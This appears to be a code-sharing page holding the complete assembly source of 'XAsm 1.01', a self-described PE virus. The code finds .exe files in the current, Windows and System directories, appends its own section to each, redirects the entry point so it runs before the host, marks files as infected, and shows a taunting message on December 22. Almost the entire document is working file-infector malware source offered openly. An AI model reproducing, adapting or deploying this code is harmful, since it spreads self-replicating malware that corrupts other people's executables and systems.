📄 xasm version 1.01(pe virus).txt
字号:
;==============================================
; XAsm Version 1.01
;==============================================
; PE Virus * ^_^ * , too easy
;==============================================
; not keep in memory,but when set the debug
; mode is false,the virus will infect PE exe
; files in %WINDOWS% & %SYSTEM% Directory!
;==============================================
; host program
.386
locals
jumps
.model flat,stdcall
include ..\Include\win32.inc
;Defined the Marco
TRUE = 1
FALSE = 0
;===============================================
; Debug Mode or Release Mode
;===============================================
DEBUG =TRUE
;===============================================
L equ <LARGE>
;define some functions
extrn GetModuleHandleA : proc
extrn MessageBoxA : proc
extrn ExitProcess : proc
;host body
.data
szMsg db 'XAsm Ready!',0
szCaption db 'Message',0
.code
host_start:
; get module handle ( call kernel32.dll )
push L 0
call GetModuleHandleA
; show message
push 1000h
lea eax,szCaption
push eax
lea eax,szMsg
push eax
push 0
call MessageBoxA
; exit host
push L 0
call ExitProcess
ends
;=====================================================
; my cute virus from here
;=====================================================
vseg segment para use32 'XASM'
assume cs : vseg
; virus body
vstart:
mov ecx,ebp ; save the ebp
mov edx,esp ; save the esp
call reloc
reloc:
pop ebp
mov eax,ebp
sub ebp,offset reloc ; get offset
sub eax,reloc-vstart
sub eax,oldoffset[ebp] ; calculate jump back to host address
mov jmpbacktemp[ebp],eax ; save jump back host address
mov oldesp[ebp],edx ; save old esp
mov oldebp[ebp],ecx ; save old ebp
; begin to cmp wether kernel32.dll in Memory ?
mov eax,krnl32[ebp]
cmp dword ptr [eax],081EC8B55h ; if in memory ?
jnz run_host ; no in then go to run host
; cmp Okey! the kernel32.dll has been loaded in memory !
lea eax,CurrentDir[ebp]
push eax
push L 256
call getcurrentdirectory
mov RestoreDir[ebp],eax
jmp start_find_file
; Get Window dir
Get_Window_Dir:
push 256
lea eax,DirTemp[ebp]
push eax
call getwindowdirectory
mov windir[ebp],1
;
; for debug: change system to d:\windows
IF DEBUG
inc byte ptr DirTemp[ebp]
ENDIF
;
jmp set_dir
; Get Windows\System dir
Get_System_Dir:
push 256
lea eax,DirTemp[ebp]
push eax
call getsystemdirectory
mov sysdir[ebp],1
;
; for debug: change system to d:\windows\system
IF DEBUG
inc byte ptr DirTemp[ebp]
ENDIF
;
set_dir:
lea eax,DirTemp[ebp]
push eax
call setcurrentdirectory
start_find_file:
lea eax,WIN32_FIND_DATA[ebp]
push eax
lea eax,findfilter[ebp]
push eax
call findfirstfile
mov searchhandle[ebp],eax
cmp eax,-1
jz run_host
jmp infectfile
no_aim:
push filehandle[ebp]
call closehandle
gonext:
lea eax,WIN32_FIND_DATA[ebp]
push eax
push searchhandle[ebp]
call findnextfile
or eax,eax
jnz infectfile
cmp windir[ebp],1
jnz Get_Window_Dir
cmp sysdir[ebp],1
jnz Get_System_Dir
jmp run_host
infectfile:
push 0 ; temphandle
push fileattr[ebp] ; file attrib
push 3 ; file exist
push 0 ; secturity NULL
push 0 ; share mode
push 80000000h+40000000h; read + write
lea eax,fullname[ebp]
push eax ; pWin32_find_data struct
call createfile
mov filehandle[ebp],eax
cmp eax,-1
jz gonext
; read offset of pe sign
push 0
push 0
push 3ch
push filehandle[ebp]
call setfilepointer
; read [3c] dword pe offset
push 0
lea eax,bytesread[ebp]
push eax
push 4
lea eax,peoffset[ebp]
push eax
push filehandle[ebp]
call readfile
or eax,eax
jz gonext
; set file pointer to pe offset
push 0
push 0
push peoffset[ebp]
push filehandle[ebp]
call setfilepointer
; read pe header
push 0
lea eax,bytesread[ebp]
push eax
push 58h
lea eax,peheader[ebp]
push eax
push filehandle[ebp]
call readfile
or eax,eax
jz no_aim
; check file
cmp dword ptr peheader[ebp],4550h
jnz no_aim ; if PE format? yes then infect
cmp word ptr peheader[ebp+1ah],0AEAEh
jz no_aim ; if infected? yes then find next
; check ok will be infect it!
; go back the pe offset and read the whole pe header
push 0
push 0
push peoffset[ebp]
push filehandle[ebp]
call setfilepointer
push 0
lea eax,bytesread[ebp]
push eax
push headersize[ebp]
lea eax,peheader[ebp]
push eax
push filehandle[ebp]
call readfile
or eax,eax
jz no_aim
mov word ptr peheader[ebp+1ah],0AEAEh ; set infected flag
;local the obj table entry
xor eax,eax
mov ax,NtHeaderSize[ebp]
add eax,18h
mov objtableoffset[ebp],eax
lea eax,peheader[ebp]
add objtableoffset[ebp],eax
;end local
xor eax,eax
xor edx,edx
mov ax,numobj[ebp]
mov ecx,40
mul ecx ; edx: eax save the offset of my section entry
mov esi,objtableoffset[ebp]
add esi,eax ; esi save the my offset of section entry in memory
inc word ptr numobj[ebp]
lea edi,newobject[ebp] ;
;
; esi: the offset of my section entry in memory
; edi: the offset of newobject made by me
;
;calculate the My section RAV value
mov eax,[esi-40+8] ; virtual size of last section
add eax,[esi-40+12] ; add virtual entry of last section
; align with the align mode
mov ecx,objalign[ebp]
xor edx,edx
div ecx
inc eax
mul ecx
mov RVA[ebp],eax
; set the virtual size
xor edx,edx
mov eax,vend-vstart+1000h
div ecx
inc eax
mul ecx
mov virtualsize[ebp],eax
;set the physical size
mov ecx,filealign[ebp]
xor edx,edx
mov eax,static_data_end-vstart
div ecx
inc eax
mul ecx
mov physicalsize[ebp],eax
;calculate the physical offset
mov eax,[esi-40+16]
add eax,[esi-40+20]
xor edx,edx
div ecx
inc eax
mul ecx
mov physicaloffset[ebp],eax
;Update the imagesize
mov ecx,objalign[ebp]
mov eax,imagesize[ebp]
add eax,vstart-vend+1000h
div ecx
inc eax
mul ecx
mov imagesize[ebp],eax
; copy the new object to pe header
xchg esi,edi
mov ecx,10
rep movsd
; calculate the RAV , to make my cute virus run first! ^o^
mov eax,RVA[ebp]
mov ebx,entrypointRVA[ebp]
mov entrypointRVA[ebp],eax
sub eax,ebx
mov oldoffset[ebp],eax
; go back to the pe start
push 0
push 0
push peoffset[ebp]
push filehandle[ebp]
call setfilepointer
; write the modifid PE header
push 0
lea eax,bytesread[ebp]
push eax
push headersize[ebp]
lea eax,peheader[ebp]
push eax
push filehandle[ebp]
call writefile
; set file pointer to the my section's physical entry address
; and write my cute virus into file
push 0
push 0
push physicaloffset[ebp]
push filehandle[ebp]
call setfilepointer
; begin to write
push 0
lea eax,bytesread[ebp]
push eax
push static_data_end-vstart+1
lea eax,vstart[ebp]
push eax
push filehandle[ebp]
call writefile
;close handle
push filehandle[ebp]
call closehandle
run_host:
;
; check trigger?
lea eax,systime[ebp]
push eax
call gettime
cmp word ptr month[ebp],12
jnz no_trigger
cmp word ptr day[ebp],22
jnz no_trigger
; show message (trigger???) kinding man? ^o^
mov eax,user[ebp]
cmp dword ptr [eax],08BEC8B55h
jnz no_trigger
push 1000h
lea eax,szvCaption[ebp]
push eax
lea eax,szvMsg[ebp]
push eax
push 0
call msgbox
no_trigger:
;
; return the host
cmp RestoreDir[ebp],0
jz go_host
lea eax,CurrentDir[ebp]
push eax
call setcurrentdirectory
go_host:
mov eax,jmpbacktemp[ebp]
mov esp,oldesp[ebp]
mov ebp,oldebp[ebp]
jmp eax
;
;
;call_table
msgbox:
mov jumptemp[ebp],0BFF541BAh
jmp jumptemp[ebp]
findfirstfile:
mov jumptemp[ebp],0BFF77BD7h
jmp jumptemp[ebp]
findnextfile:
mov jumptemp[ebp],0BFF77C0Fh
jmp jumptemp[ebp]
closehandle:
mov jumptemp[ebp],0BFF7E2D9h
jmp jumptemp[ebp]
createfile:
mov jumptemp[ebp],0BFF77B5Bh
jmp jumptemp[ebp]
setfilepointer:
mov jumptemp[ebp],0BFF771BBh
jmp jumptemp[ebp]
readfile:
mov jumptemp[ebp],0BFF770B9h
jmp jumptemp[ebp]
writefile:
mov jumptemp[ebp],0BFF77051h
jmp jumptemp[ebp]
gettime:
mov jumptemp[ebp],0BFFA1372h
jmp jumptemp[ebp]
getcurrentdirectory:
mov jumptemp[ebp],0BFF77A55h
jmp jumptemp[ebp]
getsystemdirectory:
mov jumptemp[ebp],0BFF779C2h
jmp jumptemp[ebp]
getwindowdirectory:
mov jumptemp[ebp],0BFF779F8h
jmp jumptemp[ebp]
setcurrentdirectory:
mov jumptemp[ebp],0BFF77A2Eh
jmp jumptemp[ebp]
;
;======================================================================
; static data for need
;
static_data_start:
;
oldoffset dd 2000h
jmpbacktemp dd 0
krnl32 dd 0BFF84E4Dh
user dd 0BFF53FF0h
findfilter db '*.exe',0
bytesread dd 0
peoffset dd 0
objtableoffset dd 0
szvCaption db 'Note For You',0
szvMsg db ' Happy Day, isnt it? Be careful!',0dh,0ah
db 'Virus will be with YOU! ^o^',0dh,0ah,0dh,0ah
db ' From [ XASM ] Ver 1.01',0
;
; static struct
;new object
newobject:
oname db '.XASM',0,0,0
virtualsize dd 0
RVA dd 0
physicalsize dd 0
physicaloffset dd 0
reversed dd 0,0,0
objectflags db 40h,0,0,0c0h ; code flag
; end of new object
;
static_data_end:
;
; dynanic data for need
;
memory_data_start:
; -
windir dd 0
sysdir dd 0
RestoreDir dd 0
oldesp dd 0
oldebp dd 0
searchhandle dd 0
filehandle dd 0
jumptemp dd 0
CurrentDir db 256 dup (0)
DirTemp db 256 dup (0)
; -
; some structs
; -
; SYSTIME struct
systime:
year dw 0
month dw 0
dayofweek dw 0
day dw 0
dw 0,0,0,0
; end of struct
;here defined WIN32_FIND_DATA struct
WIN32_FIND_DATA:
fileattr dd 0
createtime dd 0,0
lastaccesstime dd 0,0
lastwritetime dd 0,0
filesize dd 0,0
resv dd 0,0
fullname db 256 dup (0)
realname db 256 dup(0)
;end of WIN32_FIND_DATA struct
;defined pe header buffer
peheader:
signature dd 0 ; sign of PE: 'PE00'
cputype dw 0 ; cpu type sign
numobj dw 0 ; num of Object
db 3*4 dup (0) ; no use for us
NtHeaderSize dw 0 ; option header size
Flags dw 0 ; characteristics
db 4*4 dup (0) ; no use
entrypointRVA dd 0 ; entry point
db 3*4 dup (0) ; no use
objalign dd 0 ; objects align mode
filealign dd 0 ; file align mode
db 4*4 dup (0) ; no use
imagesize dd 0 ; image size
headersize dd 0 ; image header size
;
vend:
db 1000h dup(0) ; the other pe header bytes will read to here
; -
memory_data_end:
;
ends
end vstart
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -